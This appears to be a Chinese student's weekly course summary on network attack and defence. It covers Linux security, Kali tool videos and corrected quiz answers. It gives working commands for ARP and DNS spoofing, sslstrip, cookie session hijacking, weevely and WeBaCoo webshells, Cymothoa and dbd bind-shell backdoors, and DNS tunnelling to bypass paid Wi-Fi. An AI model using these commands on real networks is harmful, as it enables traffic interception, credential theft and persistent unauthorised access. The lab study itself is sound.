网络攻防 第八周学习总结

实验一 网络攻防环境的搭建与测试

靶机（linux）ip地址：

192.168.32.129

靶机（windows）ip地址：

192.168.32.133

攻击机(linux) ip地址：

192.168.32.128

攻击机(windows) ip地址：

192.168.32.131

二、提交自己靶机（Windows,Linux）和攻击机(Windows,Linux)正常联通（能互相ping通）的截图

1 靶机（Windows）和攻击机(Windows)

2 靶机（Windows）和攻击机(Linux)

3 靶机（Linux）和攻击机(Windows)

4 靶机（Linux）和攻击机(Linux)

教材学习内容总结

这周学习了教材的第八章，这一章主要讲了Linux操作系统的安全攻防。教材首先讲了Linux系统的基本框架，Linux系统具有以下优点：跨平台的硬件支持，丰富的软件支持，多用户多任务，可靠的安全性，良好的稳定性，完善的网络功能。Linux系统有身份认证机制，授权与访问控制机制和安全审计机制。接下来，教材介绍了Linux的远程攻防技术，攻击技术有远程口令字猜测攻击，网络服务远程渗透攻击，此外还可以攻击客户端程序和用户以及路由器和监听器。然后教材介绍了Linux本地安全攻防技术，攻击者在通过远程渗透技术获得访问权后，就会转入本地攻击，以求获得更高的权限。这些技术包括本地特权提升，在系统上消踪灭迹，远程控制后门程序。最后，教材提出作为Linux系统的维护者应充分认识到Linux的开源特性，充分利用社区提供的各种安全增强组件，及时更新系统上的服务和软件。

视频（31-35）学习中的问题和解决过程

KaliSecurity - 漏洞利用之SET（31）

Social Engineering Toolkit是一个开源工具，Python驱动的社会工程学渗透测试工具，提供了非常丰富的攻击向量库，是开源的社会工程学利用套件通常结合Metas来使用。

1、打开SET套件

命令行下输入setoolkit

菜单选项: 1是社会工程学攻击，2是Fast-Track渗透测试，3是第三方模块

1.鱼叉式钓鱼攻击

2.网站攻击

3.介质感染攻击

4.创建Payload并监听

5.群发邮件攻击

6.基于Arduino的攻击

7.短信欺骗攻击

8.无线接入点攻击

9.二维码攻击

10.powershell攻击

11.第三方模块

KaliSecurity - 嗅探欺骗与中间人攻击(32)

Linux下的中间人攻击套路是一样的，这里介绍进行ARP欺骗、DNS欺骗和嗅探以及会话劫持的方法。

(1) 为Kali设置开启端口转发

echo 1 > /proc/sys/net/ipv4/ip_forward
cat /proc/sys/net/ipv4/ip_forward 修改为1

(2) 设置ssltrip

为了劫持SSL数据，需要https数据变为http：

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8081

让sslrtip在8081端口监听：

sslstrip -l 8081

（3）ettercap的准备

ettercap是一套用于中间人攻击的工具。和dsniff套件齐名。支持插件和过滤脚本，直接将账号、密码显示出来，不用人工提取数据。如果是第一次中间人攻击操作，那么要对kali下的etteracp做点配置。
配置文件是/etc/ettercap/etter.conf，首先要将ec_uid、ec_gid都变为0

然后找到linux分类下的if you use iptables这一行，将注释（“#”号）去掉，打开转发。

打开图形化界面 ettercap -G

选择嗅探网卡 默认eth0

(4) Ettercap使用

打开ettercap，选择sniff选项-unified sniffing-选择网卡-hosts选项：先scan for hosts，等扫描完了选host list。

重新访问百度网站：发现已经从https变成http

5、Dsniff套装介绍

Dsniff套装主要是arpspoof和dsniff，前者用来进行arp欺骗，后者用于嗅探。进行攻击步骤如下：
进行arp欺骗：
arpspoof [-i interface（网卡）] [-c own|host|both（欺骗方式，通常是both）] [-t target（目标）] [-r] host（网关）
进行嗅探：
dsniff [-cdmn] [-i interface | -p pcapfile] [-s snaplen] [-f services] [-t trigger[,...]] [-r|-w savefile] [expression]
-c打开半双工TCP流，允许在使用arpspoof时进行正确的嗅探操作；
-d启动调试模式；
-f以/etc/service格式从文件中加载触发器（也就是口令嗅探的服务类型）；
-I使用特定的网络接口；
-m使用dsniff.magic文件通过在magic文件中定义的特征尝试自动判断协议；
-n不执行主机查找；
-r从前面保存的会话中读取被嗅探的数据；
-s最多对报文的前个字节进行嗅探，如果用户名和口令信息包含在随后的默认1024字节界限中；
-t使用格式port/proto=servise；来加载一个以逗号界定的触发器集；

6、会话劫持

这里主要以cookies进行举例，说明会话劫持的用法。
开始arp欺骗；
arpspoof -i wlan0 -t 192.168.1.1 192.168.1.102
捕获数据报：
tcpdump -i wlan -w test.cap
等一段时间，估计目标会登录网站了，我们开始处理捕获的数据包：
forret -r test.cap
如果捕获的数据包没什么问题，而且确定开启了端口转发，那么经过处理的数据包会自动生成hamster.txt
接下来运行hamster hamster
会提示浏览器设置代理为http://127.0.0.1:1234
接着在浏览器中代开hamster：http://hamster
选择目标和可能的登录认证地址，然后点击链接会发现劫持成功。

7、图片截获

利用Driftnet这款工具我们可以看到受害人在访问网站的图片。
首先依然使用arpspoof启动arp欺骗，然后启动driftnet：
driftent -i
此时弹出一个小窗口，当目标访问有图片的网站的时候，攻击者就能在这个小窗口看到。

8、DNS欺骗

利用Dsniff套装中的dnsspoof或者ettercap的dnsspoof插件，我们可以完成对受害者的dns欺骗。
在开始欺骗前，首先我们要编辑一个自己的hosts文件，放在方便访问的地方。内容和本机自带的hosts内容差不多，只是把你想欺骗的域名和想要欺骗到哪里的地址写好（通常是攻击者指定的服务器，用来执行浏览器溢出或者java applet攻击，用来获取受害者的计算机访问权限）
host文件：127.0.0.1 www.baidu.com
上面是一个hosts文件示例，把百度定向到了本机。我们把它保存成hosts，位于/root目录下。
然后启动dnsspoof：dnsspoof -i wlan0 -f /root/hosts
等受害者访问百度观察效果。

9、URL监控

利用Dsniff套装中的urlsnarf工具，我们对TCP80、3128、8080端口的HTTP通信进行解析，并且可以将嗅探到的所有HTTP请求转存为通用日志格式（Common Log Format，CLF），这种格式是许多Web服务器所使用的，例如IIS和Apache，事后可以很方便的使用一些日志分析工具来分析记录结果。
Usage：urlsnarf [-n] [-i interface | -p pcapfile] [[-v] pattern [expression]]

10、下载软件监控

利用Dsniff套装中的filesnarf工具，我们可以从嗅探到的NFS通信中，选定某个文件，转存到本地当前工作目录。
Ussage：filesnarf [-i interface | -p pcapfile] [[-v] pattern [expression]]

KaliSecurity - 权限维持之后门（33）

权限维持包含Tunnel工具集、Web后门、系统后门三个子类。其中系统后门与Web后门统称为后门，都是为渗透测试后，为方便再次进入系统而留下的恶意程序。

1、WEB后门

(1)Weevely

Weevely是一款使用pythoon编写的webshell工具（集webshell生成和连接于一身，仅限于安全学习教学之用，禁止非法用途），可以算作是linux下的一款菜刀替代工具（限于php），某些模块在win上无法使用。

生成一个php后门，weevely generate test ~/1.php, test为密码，在本地生成~/1.php

后门上传到web，使用weevely连接

打开Metasploitable2

nano 1.php 复制生成文件内容到其中

weevely http://192.168.75.132/1.php

(2)WeBaCoo（Web Backdoor Cookie）script-kit

是一个小巧的、隐蔽的php后门，它提供了一个可以连接远程web服务器并执行php代码的终端。WebaCoo使用HTTP响应头传送命令结果，shell命令经base64编码后隐藏在Cookie中。生成一个webshell：

上传到网站后，使用webacoo连接：

webacoo -t -u http://192.168.75.132/2.php

通过加入：执行本地命令，不加则借助webshell执行命令。

2、系统后门

（1）Cymothoa系统后门

cymothoa -10500 -s -0 -y 2333 (注入2333端口)，如果成功，可以连接2333端口返回一个shell

（2）dbd理解为加密版的nc

监听端：dbd -l -p 2333 -e /bin/bash -k password

攻击端：dbd 127.0.0.1 2333 -k password

（3）sbd和dbd用法相同

（6）U3-Pwn

与Metasploit Payload结合使用的工具，菜单可以单刀多针对移动光驱设备如光驱镜像，u盘等。

（7）Intersect

执行后门，在目标机上执行 1.py -b，则生成一个bind shell后门，如果之前设置好remote host和remote port，也可以设置为reverse shell,此时连接后门端口成功，返回shell.

Kali权限维持之Tunnel(34)

权限维持包括Tunnel工具集、web后门、系统后门三个子类。Tunnel工具集包含了一系列用于建立通信隧道、代理的工具：

（1）CryptCat

Netcat大家都很熟悉了，有网络工具中的瑞士军刀之称，但是它本身建立的隧道是不加密的，于是有了cryptcat。与dbd/sbd使用也类似。

（2）DNS2TCP

DNS tunnel即DNS通道。从名字上看就是利用DNS查询过程建立起隧道，传输数据。
在酒店等公共场所，通常有wifi信号，但当访问第一个网站时，可能会弹出窗口，需要输入用户名密码，登陆后才可以继续上网（该技术一般为透明http代理）。但有时会发现获取到的dns地址是有效的，并且可以进行dns查询，这时可以使用DNS tunnel技术来实现免费上网。
DNS tunnel原理
通过特定服务器，让局域网内的DNS服务器为我们实现数据转发。DNS tunnel实现的工具有很多，比如：OzymanDNS, tcp-over-dns, heyoks, iodine, dns2tcp

（3）Iodine

（4）Miredo

Miredo是一个网络工具，主要用于BSD和Linux的IPV6 Teredo隧道转换，可以转换不支持IPV6的网络连接IPV6，内核中需要有IPV6和TUN隧道支持。

（5）Proxychains

内网渗透测试经常会用到一款工具，如我们使用Meterpreter开设一个Socks4a代理服务，通过修改/etc/prosychains.conf配置文件，加入代理，即可使其他工具如sqlmap、namp直接使用代理扫描内网。
如proxychain namp 10.0.0.1/24

（6）Proxytunnel

Proxytunnel可以通过标准的Https代理来连接远程服务器，这是一个代理，实现了桥接的功能。特别用于通过SSH进行Http(s)传输
Prosytunnel可用于：
使用http(s)代理（http connect 命令）创建通讯通道
为OpwnSSH写一个客户端驱动，并创建基于SSH连接的http(s)代理
作为一个独立的应用，可以连接到远程服务器

（7）Ptunnel

借助ICMP数据包建立隧道通信

（8）Pwant

内网下通过UDP通信

（9）sslh
一个ssl/ssh端口复用工具，sslh可以在同一个端口上接受https，ssh和openvpn连接。这使得通过443端口连接ssh服务器或者openvpn服务器同时在该端口上提供https服务成为可能。sslh可以作为一个研究端口复用的例子。

Kali逆向工程工具（35）

逆向工程是根据已有的东西和结果，通过分析来推导具体的实现方法。比如看到别人的某个exe程序能够做出某种漂亮的动画效果，可以通过反汇编、反编译和动态跟踪等方法，分析出其动画效果的实现过程，这种行为就是逆向工程；不仅仅是反编译，而且还要推倒出设计，并且文档化，逆向软件工程的目的是使软件得以维护。

（1）Edb-Debugger
EDB（Evan's Debugger）是一个基于Qt4开发的二进制调试工具，主要是为了跟OllyDbg工具看齐，通过插件体系可以进行功能的扩充，当前只支持Linux。

（2）Ollydbg
经典的Ring3级调试器，是一个动态调试工具，将IDA与SoftICE结合起来的思想。在Kali下是Wine方式运行的Ollydbg。
（3）jad
（4）Redare2
（5）Recstudio2
（6）Apktool
（7）Clang、Clang++
（8）D2j-des2jar
（9）Flasm

学习进度条

完成《网络攻防技术与实践》第8章内容；看完KALI视频前31-35节

||||||||||||||
|:--|:--|:--|:--|
| |视频学习（新增/累计）|教材学习|博客量（新增/累计）|
|目标|34个视频|12章（网络攻击技术与实践）| |
|第一周|（实验楼学习）|（实验楼学习）|1/1|
|第二周|5/5|第1、2章|1/2|
|第三周|5/10|第3章|1/3|
|第四周|5/15|第4章|1/4|
|第五周|5/20|第11、12章|1/6|
|第六周|5/25|第5、6章|1/7|
|第七周|5/30|第7章|1/8|
|第八周|5/35|第8章|1/9|

错题总结

1、相对路径，也就是相对于你当前的目录的路径，相对路径是以当前目录 （）为起点，以你所要到的目录为终点。

A .
B ..
C /
D ~

正确答案： A

. 当前目录，..父目录， / 根目录， ~ home目录

2、下面在Windows中可以进行远程控制的是（）

A L0phtcrack
B Netcat
C Meterpreter
D Cachedump

正确答案： B C

3、下列漏洞信息库中，安全漏洞命名索引的事实标准是（）

A .NVD
B .CVE
C .OSVDB
D .SecurityFocus

正确答案： B

4、Windows安全中心中的功能包括（）

A .安全审计
B .身份认证
C .防火墙
D .授权与访问控制
E .病毒防护

正确答案： C E

5、Window远程登录用户的身份认证是（）负责的

A .SRM
B .WinLogon
C .LSASS
D .Netlogon

正确答案： D

6、Windows操作系统基于（ ）模型来实现基本的对象安全模型。

A .LSASS
B .SRM
C .引用监控器
D .EventLog

正确答案： C

7、Windows中，下面的模块或服务处在用户态下：
A .hal.dll
B .win32k.dll
C .kernel32.dll
D .LSASS

正确答案： C D

参考资料

• 《网络攻防技术与实践》教材
• kali视频
• 《网络攻防技术与实践》诸葛建伟著，光盘中的第8章的内容